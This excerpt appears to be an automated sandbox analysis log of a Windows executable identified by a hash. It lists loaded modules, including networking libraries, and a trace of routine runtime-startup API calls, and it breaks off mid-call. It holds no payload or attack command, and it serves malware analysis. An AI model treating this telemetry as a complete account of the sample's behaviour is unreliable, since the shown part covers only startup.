Region: id = 605 start_va = 0x77390000 end_va = 0x7741cfff monitored = 0 entry_point = 0x773d9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 606 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 607 start_va = 0x77730000 end_va = 0x7773bfff monitored = 0 entry_point = 0x77733930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 608 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 609 start_va = 0x1100000 end_va = 0x117ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 610 start_va = 0x550000 end_va = 0x562fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 611 start_va = 0xd5d0000 end_va = 0xe60ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 612 start_va = 0x753d0000 end_va = 0x754bafff monitored = 0 entry_point = 0x7540d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 613 start_va = 0xe610000 end_va = 0xe6a0fff monitored = 0 entry_point = 0xe648cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 614 start_va = 0x70770000 end_va = 0x7097cfff monitored = 0 entry_point = 0x7085acb0 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 615 start_va = 0x77680000 end_va = 0x776c4fff monitored = 0 entry_point = 0x7769de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 616 start_va = 0x720c0000 end_va = 0x7238afff monitored = 0 entry_point = 0x722fc4c0 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 617 start_va = 0x74ed0000 end_va = 0x753c8fff monitored = 0 entry_point = 0x750d7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 618 start_va = 0x77640000 end_va = 0x77676fff monitored = 0 entry_point = 0x77643b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 619 start_va = 0x74e70000 end_va = 0x74eb3fff monitored = 0 entry_point = 0x74e77410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 620 start_va = 0x77320000 end_va = 0x7732efff monitored = 0 entry_point = 0x77322e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 621 start_va = 0x75db0000 end_va = 0x771aefff monitored = 0 entry_point = 0x75f6b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 622 start_va = 0x74660000 end_va = 0x746f1fff monitored = 0 entry_point = 0x74698cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 623 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "counters.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 624 start_va = 0x75b90000 end_va = 0x75beefff monitored = 0 entry_point = 0x75b94af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 625 start_va = 0x70740000 end_va = 0x70751fff monitored = 0 entry_point = 0x70744510 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 626 start_va = 0x71f80000 end_va = 0x71faefff monitored = 0 entry_point = 0x71f8bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 627 start_va = 0x706a0000 end_va = 0x7073afff monitored = 0 entry_point = 0x706df7e0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 628 start_va = 0xff0000 end_va = 0x102ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 629 start_va = 0x1030000 end_va = 0x103ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 630 start_va = 0xe610000 end_va = 0xe70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e610000" filename = "" Region: id = 631 start_va = 0x72040000 end_va = 0x7208efff monitored = 0 entry_point = 0x7204d850 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 632 start_va = 0x70690000 end_va = 0x70697fff monitored = 0 entry_point = 0x70691fc0 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 633 start_va = 0x74ec0000 end_va = 0x74ec6fff monitored = 0 entry_point = 0x74ec1e10 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 637 start_va = 0x1180000 end_va = 0x11bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001180000" filename = "" Region: id = 638 start_va = 0xe710000 end_va = 0xe80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e710000" filename = "" Region: id = 639 start_va = 0x6a0000 end_va = 0x6b5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 640 start_va = 0x11c0000 end_va = 0x11d3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 641 start_va = 0xe810000 end_va = 0xe930fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000e810000" filename = "" Region: id = 642 start_va = 0x560000 end_va = 0x56efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 643 start_va = 0x6a0000 end_va = 0x6ccfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 661 start_va = 0x6a0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Thread: id = 1 os_tid = 0x1200 [0098.226] GetStartupInfoW (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0098.226] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.226] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x570000 [0099.714] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74580000 [0099.714] GetProcAddress (hModule=0x74580000, lpProcName="FlsAlloc") returned 0x7459a980 [0099.714] GetProcAddress (hModule=0x74580000, lpProcName="FlsGetValue") returned 0x74597570 [0099.715] GetProcAddress (hModule=0x74580000, lpProcName="FlsSetValue") returned 0x74599e30 [0099.715] GetProcAddress (hModule=0x74580000, lpProcName="FlsFree") returned 0x745a4ff0 [0099.716] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x214) returned 0x5705a8 [0099.716] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74580000 [0099.718] GetCurrentThreadId () returned 0x1200 [0099.718] GetStartupInfoW (in: lpStartupInfo=0x19feb4 | out: lpStartupInfo=0x19feb4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0099.718] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x5707c8 [0099.718] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0099.718] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0099.718] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0099.718] SetHandleCount (uNumber=0x20) returned 0x20 [0099.718] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe\" " [0099.718] GetEnvironmentStringsW () returned 0x6dfd68* [0099.718] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xa1a) returned 0x570fd0 [0099.719] FreeEnvironmentStringsW (penv=0x6dfd68) returned 1 [0099.719] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13233c8, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\d1d622e31d20a69fc6fea0d98996607f37f6204bb02625bfb329cfdbb8edb6e6.exe")) returned 0x62 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0xce) returned 0x5719f8 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x571ad0 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3e) returned 0x571b68 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x5c) returned 0x571bb0 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x6e) returned 0x571c18 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x78) returned 0x571c90 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x571d10 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x28) returned 0x571d80 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x571db0 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1a) returned 0x571e00 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x571e28 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x62) returned 0x571e70 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2a) returned 0x571ee0 [0099.719] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x571f18 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1c) returned 0x571f50 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd2) returned 0x571f78 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x7c) returned 0x572058 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x5720e0 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3a) returned 0x572120 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x90) returned 0x572168 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x572200 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x30) returned 0x572230 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x36) returned 0x572268 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x48) returned 0x5722a8 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x5722f8 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x3c) returned 0x572358 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0xd6) returned 0x5723a0 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2e) returned 0x572480 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x1e) returned 0x5724b8 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x5724e0 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x54) returned 0x572518 [0099.720] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x52) returned 0x572578 [0099.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x5725d8 [0099.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x42) returned 0x572608 [0099.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x2c) returned 0x572658 [0099.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x44) returned 0x572690 [0099.721] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x24) returned 0x5726e0 [0099.726] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x570fd0 | out: hHeap=0x570000) returned 1 [0099.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x80) returned 0x572710 [0099.727] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x8, Size=0x800) returned 0x572798 [0099.727] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.727] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.727] GetLastError () returned 0x0 [0099.728] SetLastError (dwErrCode=0x0) [0099.728] GetLastError () returned 0x0 [0099.728] SetLastError (dwErrCode=0x0) [0099.728] GetLastError () returned 0x0 [0099.728] SetLastError (dwErrCode=0x0) [0099.728] GetACP () returned 0x4e4 [0099.728] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x220) returned 0x570fd0 [0099.728] GetLastError () returned 0x0 [0099.728] SetLastError (dwErrCode=0x0) [0099.728] IsValidCodePage (CodePage=0x4e4) returned 1 [0099.728] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0099.728] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0099.728] GetLastError () returned 0x0 [0099.728] SetLastError (dwErrCode=0x0) [0099.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.728] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ៴ģĀ") returned 256 [0099.728] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ៴ģĀ", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0099.729] GetLastError () returned 0x0 [0099.729] SetLastError (dwErrCode=0x0) [0099.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.729] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.729] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.730] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0099.730] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x0f½ú¬\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0099.730] GetLastError () returned 0x0 [0099.730] SetLastError (dwErrCode=0x0) [0099.730] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0099.730] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0099.730] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0099.730] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0099.730] WideCharToMultiByte (in: 